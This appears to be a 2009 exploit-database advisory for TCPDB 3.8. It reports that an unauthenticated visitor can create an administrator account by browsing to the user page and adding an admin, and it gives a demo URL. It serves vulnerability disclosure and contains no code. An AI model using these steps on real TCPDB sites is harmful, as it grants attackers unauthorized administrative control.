id: 5142
date: 05/06/2009
title: TCPDB 3.8 Arbitrary Add Admin Account Vulnerability
author: Mr.tro0oqy
cves: 

===================================================
TCPDB 3.8 Arbitrary Add Admin Account Vulnerability
===================================================


=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :TCPDB version 3.8 Add Admin Exploit

[+] Download : http://www.tcpdb.com/modules.php?name=Downloads&d_op=viewdownload&cid=2

[+] Found by : Mr.tro0oqy
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
step 1 : go to 

http://localhost/path/user


step 2 : add admin


=======================================================
++++++++++++++++++++++ Demo +++++++++++++++++++++++++
=======================================================


http://www.tcpdb.com/demo/user

=======================================================



#  0day.today [2023-03-25]  #